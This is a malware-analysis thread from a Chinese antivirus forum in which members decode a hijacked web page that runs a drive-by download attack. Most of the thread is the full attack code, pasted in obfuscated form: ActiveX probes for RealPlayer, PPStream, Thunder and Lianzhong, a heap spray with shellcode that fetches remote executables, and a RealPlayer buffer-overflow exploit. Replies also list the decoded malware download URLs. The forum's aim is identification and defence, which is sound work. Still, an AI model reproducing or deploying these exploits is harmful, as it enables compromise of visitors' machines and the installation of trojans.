查看: 4354|回复: 15
收起左侧

[已鉴定] who看一下

 关闭 [复制链接]
qianwenxiang
发表于 2007-12-25 20:23:10 | 显示全部楼层 |阅读模式
src=http://www.im54.com/go.js></script><script language="JavaScript" type="text/javascript"

jumpto
hxxp://service-google.cn/vip/wm2/index.html
hxxp://service-google.cn/vip/wm2/pps.html
hxxp://service-google.cn/vip/wm2/real.html
jimmyleo
发表于 2007-12-25 20:45:01 | 显示全部楼层
貌似实效了……?
阿祥直接发上来?
qianwenxiang
 楼主| 发表于 2007-12-25 21:18:59 | 显示全部楼层

回复 2楼 jimmyleo 的帖子

好像加了2层..解了一层就不会了
index.htm
<script>
        window.onerror=function(){return true;}
        window.status="完成";
</script>
<script language="javascript">
        var qq141809="%3CHtml%3E%0D%0A%3CBody%3E%0D%0A%3Cnoscript%3E%0D%0A%3Ciframe%20src%3D*%3E%3C/iframe%3E%0D%0A%3C/noscript%3E%0D%0A%3Cscript%20language%3D%22javaScript%22%3E%0D%0Afunction%20init%28%29%7Bdocument.write%28%29%3B%7D%0D%0Awindow.onload%20%3D%20init%3B%0D%0Aif%28document.cookie.indexOf%28%27Cuteqqs%27%29%3D%3D-1%29%7B%0D%0Atry%7Bvar%20e%3B%0D%0Avar%20ado%3D%28document.createElement%28%22object%22%29%29%3B%0D%0Avar%20str%3D%22c%22+%22lsid%3AB%22+%22D96C%22+%22556-65A3-11D0-983A-00C04FC29E36%22%3B%0D%0Aado.setAttribute%28%22classid%22%2Cstr%29%3B%0D%0Avar%20as%3Dado.createobject%28%22Adodb.Stream%22%2C%22%22%29%7D%0D%0Acatch%28e%29%7B%7D%3B%0D%0Afinally%7B%0D%0Avar%20expires%3Dnew%20Date%28%29%3B%0D%0Aexpires.setTime%28expires.getTime%28%29+24*60*60*1000%29%3B%0D%0Adocument.cookie%3D%27Cuteqqs%3Dqq141809%3Bpath%3D/%3Bexpires%3D%27+expires.toGMTString%28%29%3B%0D%0Aif%28e%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27614.html%27%3E%3C%5C/iframe%3E%22%29%7D%0D%0Aelse%7B%0D%0Atry%7Bvar%20r%3Bvar%20reals%3Dnew%20ActiveXObject%28%22IERPCtl.IERPCtl.1%22%29%3B%7D%0D%0Acatch%28r%29%7B%7D%3B%0D%0Afinally%7Bif%28r%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27bf.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bvar%20h%3Bvar%20pps%3Dnew%20ActiveXObject%28%22POWERPLAYER.PowerPlayerCtrl.1%22%29%3B%7D%0D%0Acatch%28h%29%7B%7D%3B%0D%0Afinally%7Bif%28h%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27pps.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bvar%20i%3Bvar%20thunder%3Dnew%20ActiveXObject%28%22DPClient.Vod%22%29%3B%7D%0D%0Acatch%28i%29%7B%7D%3B%0D%0Afinally%7Bif%28i%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27xl.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bvar%20j%3Bvar%20lianzhong%3Dnew%20ActiveXObject%28%22GLCHAT.GLChatCtrl.1%22%29%3B%7D%0D%0Acatch%28j%29%7B%7D%3B%0D%0Afinally%7Bif%28j%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27lz.html%27%3E%3C%5C/iframe%3E%22%29%7D%0D%0Aif%28r%3D%3D%22%5Bobject%20Error%5D%22%26%26h%3D%3D%22%5Bobject%20Error%5D%22%26%26i%3D%3D%22%5Bobject%20Error%5D%22%26%26j%3D%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27real.html%27%3E%3C%5C/iframe%3E%22%29%0D%0A%7D%7D%0D%0A%7D%7D%7D%0D%0A%3C/script%3E%0D%0A%3Cscript%3Ewindow.onerror%3Dfunction%28%29%7Breturn%20true%3B%7D%3C/script%3E%0D%0A%3C/Body%3E%0D%0A%3C/Html%3E";
        qq141809=unescape(qq141809);
        document.write(qq141809);
</SCRIPT>
<iframe width='0' height='0' src='real.html'></iframe>


pps.htm
<script>window.onerror=function(){return true;}</script>
<script language="javascript">
        var qqstr="%3Cscript%3E%0D%0Aurl%3D%22%25u7468%25u7074%25u2f3a%25u642f%25u776f%25u2e6e%25u616d%25u616c%25u6373%25u632e%25u2f6e%25u7070%25u2e73%25u7865%25u0065%22%3B%0D%0Apps%3D%28document.createElement%28%22object%22%29%29%3B%0D%0A%0D%0Avar%20str%3D%22clsid%3A5EC%22%3B%0D%0Astr%3Dstr+%227C511-CD0F-42E6-8%22%3B%0D%0Astr%3Dstr+%2230C-1BD9%22%3B%0D%0Astr%3Dstr+%22882F3458%22%3B%0D%0A%0D%0Apps.setAttribute%28%22classid%22%2Cstr%29%3B%0D%0Avar%20s21%3D%22%25u616f%25u4c64%25u6269%25u6172%25u7972%25u0041%25u7275%25u6d6c%22%20%3B%0D%0Avar%20s22%3D%22%25u6e6f%25u5500%25u4c52%25u6f44%25u6e77%25u6f6c%25u6461%25u6f54%22%20%3B%0D%0Avar%20s1%3D%22%25uf3e9%25u0000%25u9000%22%3B%0D%0Avar%20s2%3D%22%25u9090%25u5a90%25ua164%25u0030%25u0000%25u408b%25u8b0c%22%20%3B%0D%0Avar%20s3%3D%22%25u1c70%25u8bad%25u0840%25ud88b%25u738b%25u8b3c%25u1e74%25u0378%22%20%3B%0D%0Avar%20s4%3D%22%25u8bf3%25u207e%25ufb03%25u4e8b%25u3314%25u56ed%25u5157%25u3f8b%22%20%3B%0D%0Avar%20s5%3D%22%25ufb03%25uf28b%25u0e6a%25uf359%25u74a6%25u5908%25u835f%25u04c7%22%20%3B%0D%0Avar%20s6%3D%22%25ue245%25u59e9%25u5e5f%25ucd8b%25u468b%25u0324%25ud1c3%25u03e1%22%20%3B%0D%0Avar%20s7%3D%22%25u33c1%25u66c9%25u088b%25u468b%25u031c%25uc1c3%25u02e1%25uc103%22%20%3B%0D%0Avar%20s8%3D%22%25u008b%25uc303%25ufa8b%25uf78b%25uc683%25u8b0e%25u6ad0%25u5904%22%20%3B%0D%0Avar%20s9%3D%22%25u6ae8%25u0000%25u8300%25u0dc6%25u5652%25u57ff%25u5afc%25ud88b%22%20%3B%0D%0Avar%20s10%3D%22%25u016a%25ue859%25u0057%25u0000%25uc683%25u5613%25u8046%25u803e%22%20%3B%0D%0Avar%20s11%3D%22%25ufa75%25u3680%25u5e80%25uec83%25u8b40%25uc7dc%25u6303%25u646d%22%20%3B%0D%0Avar%20s12%3D%22%25u4320%25u4343%25u6643%25u03c7%25u632f%25u4343%25u03c6%25u4320%22%20%3B%0D%0Avar%20s13%3D%22%25u206a%25uff53%25uec57%25u04c7%25u5c03%25u2e61%25uc765%25u0344%22%20%3B%0D%0Avar%20s14%3D%22%25u7804%25u0065%25u3300%25u50c0%25u5350%25u5056%25u57ff%25u8bfc%22%20%3B%0D%0Avar%20s15%3D%22%25u6adc%25u5300%25u57ff%25u68f0%25u2451%25u0040%25uff58%25u33d0%22%20%3B%0D%0Avar%20s16%3D%22%25uacc0%25uc085%25uf975%25u5251%25u5356%25ud2ff%25u595a%25ue2ab%22%20%3B%0D%0Avar%20s17%3D%22%25u33ee%25uc3c0%25u0ce8%25uffff%25u47ff%25u7465%25u7250%25u636f%22%20%3B%0D%0Avar%20s18%3D%22%25u6441%25u7264%25u7365%25u0073%25u6547%25u5374%25u7379%25u6574%22%20%3B%0D%0Avar%20s19%3D%22%25u446d%25u7269%25u6365%25u6f74%25u7972%25u0041%25u6957%25u456e%22%20%3B%0D%0Avar%20s20%3D%22%25u6578%25u0063%25u7845%25u7469%25u6854%25u6572%25u6461%25u4c00%22%20%3B%0D%0Avar%20s23%3D%22%25u6946%25u656c%25u0041%22%3B%0D%0Avar%20s%3Ds1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13+s14+s15+s16+s17+s18+s19+s20+s21+s22+s23+url%3B%0D%0Avar%20shellcode%20%3D%20unescape%28s%29%3B%0D%0As%3D%22%25u9090%22%3B%0D%0As%3Ds+%22%25u9090%22%3B%0D%0Avar%20bigblock%20%3D%20unescape%28s%29%3B%0D%0Avar%20headersize%20%3D%2020%3B%0D%0Avar%20slackspace%20%3D%20headersize+shellcode.length%3B%0D%0Awhile%20%28bigblock.length%3Cslackspace%29%20bigblock+%3Dbigblock%3B%0D%0Afillblock%20%3D%20bigblock.substring%280%2C%20slackspace%29%3B%0D%0Ablock%20%3D%20bigblock.substring%280%2C%20bigblock.length-slackspace%29%3B%0D%0Awhile%28block.length+slackspace%3C0x40000%29%20block%20%3D%20block+block+fillblock%3B%0D%0Amemory%20%3D%20new%20Array%28%29%3B%0D%0Anewm%3Dmemory%3B%0D%0Afor%20%28x%3D0%3B%20x%3C400%3B%20x++%29%20newm%5Bx%5D%20%3D%20block+shellcode%3B%0D%0Avar%20buffer%20%3D%20%27%27%3B%0D%0Awhile%20%28buffer.length%20%3C%20500%29%20buffer+%3D%22%5Cx0a%5Cx0a%5Cx0a%5Cx0a%22%3B%0D%0Apps.Logo%20%3D%20buffer%3B%0D%0A%3C/script%3E";
        qqstr=unescape(qqstr);
        document.write(qqstr);
</SCRIPT>

real.htm
<script>window.onerror=function(){return true;}</script>
<script language="javascript">
var qq141="%3Cscript%3E%0D%0Adocument.writeln%28%22%3CsCrIpT%20LAnGuAgE%3D%5C%22jAvAsCrIpT%5C%22%3Efunction%20RealExploit%28%29%7Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bvar%20user%3Dnavigator.userAgent.toLowerCase%28%29%3Bif%28user.indexOf%28%5C%22msie%206%5C%22%29%3D%3D-1%26%26user.indexOf%28%5C%22msie%207%5C%22%29%3D%3D-1%29return%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bif%28user.indexOf%28%5C%22nt%205.%5C%22%29%3D%3D-1%29return%3BVulObject%3D%5C%22IER%5C%22+%5C%22PCtl.I%5C%22+%5C%22ERP%5C%22+%5C%22Ctl.1%5C%22%3Btry%7BReal%3Dnew%20ActiveXObject%28VulObject%29%3B%7Dcatch%28error%29%7Breturn%3B%7Ddocument.cookie%3D%5C%22Cookie2%3DPOPWINDOS%3Bexpires%3D%5C%22+Then.toGMTString%28%29%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BRealVersion%3DReal.PlayerProperty%28%5C%22PRODUCTVERSION%5C%22%29%3BPadding%3D%5C%22%5C%22%3BJmpOver%3Dunescape%28%5C%22%2575%2506%2574%2504%5C%22%29%3Bfor%28i%3D0%3Bi%3C32*148%3Bi++%29Padding+%3D%5C%22S%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bif%28RealVersion.indexOf%28%5C%226.0.14.%5C%22%29%3D%3D-1%29%7Bif%28navigator.userLanguage.toLowerCase%28%29%3D%3D%5C%22zh-cn%5C%22%29ret%3Dunescape%28%5C%22%257f%25a5%2560%5C%22%29%3Belse%20if%28navigator.userLanguage.toLowerCase%28%29%3D%3D%5C%22en-us%5C%22%29ret%3Dunescape%28%5C%22%254f%2571%25a4%2560%5C%22%29%3Belse%20return%3B%7Delse%20if%28RealVersion%3D%3D%5C%226.0.14.544%5C%22%29ret%3Dunescape%28%5C%22%2563%2511%2508%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.550%5C%22%29ret%3Dunescape%28%5C%22%2563%2511%2504%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.552%5C%22%29ret%3Dunescape%28%5C%22%2579%2531%2501%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.543%5C%22%29ret%3Dunescape%28%5C%22%2579%2531%2509%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.536%5C%22%29ret%3Dunescape%28%5C%22%2551%2511%2570%2563%5C%22%29%3Belse%20return%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bif%28RealVersion.indexOf%28%5C%226.0.10.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C4%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.11.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C6%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.12.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C9%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.14.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C10%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Dafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BAdjESP%3D%5C%22LLLL%5C%5C%5C%5CXXXXXLD%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BShell%20%3D%5C%22TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSTPorWPnTn0m3QRL3QQce3tnasPntot23UQqRLTnU5PxquOpgp%5C%22%3B%22%29%3B%0D%0Adocument.writeln%28%22PayLoad%3DPadding+AdjESP+Shell%3Bwhile%28PayLoad.length%3C0x8000%29PayLoad+%3D%5C%22ChuiZi%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BReal%5B%5C%22%5C%5Cx49%5C%5Cx6d%5C%5Cx70%5C%5Cx6f%5C%5Cx72%5C%5Cx74%5C%22%5D%28%5C%22c%3A%5C%5C%5C%5CProgram%20Files%5C%5C%5C%5CNetMeeting%5C%5C%5C%5CTestSnd.wav%5C%22%2CPayLoad%2C%5C%22%5C%22%2C0%2C0%29%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3B%7Dvar%20Then%3Dnew%20Date%28%29%3BThen.setTime%28Then.getTime%28%29+24*60*60*1000%29%3Bvar%20cookieString%3Dnew%20String%28document.cookie%29%3Bvar%20cookieHeader%3D%5C%22Cookie2%3D%5C%22%3Bvar%20beginPosition%3DcookieString.indexOf%28cookieHeader%29%3Bif%28beginPosition%3D%3D-1%29%7BRealExploit%28%29%3B%7D%3C%5C/script%3E%22%29%3B%0D%0A%3C/script%3E";
qq141=unescape(qq141);
document.write(qq141);
</SCRIPT>
jimmyleo
发表于 2007-12-25 21:25:18 | 显示全部楼层
index 暗含
[frame]614.html
[frame]bf.html
[frame]pps.html
[frame]xl.html
[frame]lz.html
[frame]real.html
挂了这么多 又是生成器……
jimmyleo
发表于 2007-12-25 21:26:39 | 显示全部楼层
solcroft
发表于 2007-12-25 21:27:33 | 显示全部楼层
原帖由 qianwenxiang 于 2007-12-25 22:48 发表
好像加了2层..解了一层就不会了
index.htm


pps.htm

real.htm

基本上都解出来了,你把%??都unescape一下看看
jimmyleo
发表于 2007-12-25 21:27:42 | 显示全部楼层
qigang
发表于 2007-12-25 21:31:52 | 显示全部楼层

回复 7楼 jimmyleo 的帖子

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.Win32.Mnless.zyt  

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.24.12

virus.rar

62.2 KB, 下载次数: 69

ytmss15
发表于 2007-12-25 21:35:09 | 显示全部楼层
大虾们,能教教我怎么解密吗?
qianwenxiang
 楼主| 发表于 2007-12-25 21:35:19 | 显示全部楼层
index 暗含
[frame]614.html
[frame]bf.html
[frame]pps.html
[frame]xl.html
[frame]lz.html
[frame]real.html
挂了这么多 又是生成器……
基本上都解出来了,你把%??都unescape一下看看


我想我猜出来了..

http://down.malasc.cn/614.exe
http://down.malasc.cn/bf.exe
http://down.malasc.cn/pps.exe
http://down.malasc.cn/xl.exe
http://down.malasc.cn/lz.exe
http://down.malasc.cn/real.exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 16:44 , Processed in 0.137280 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表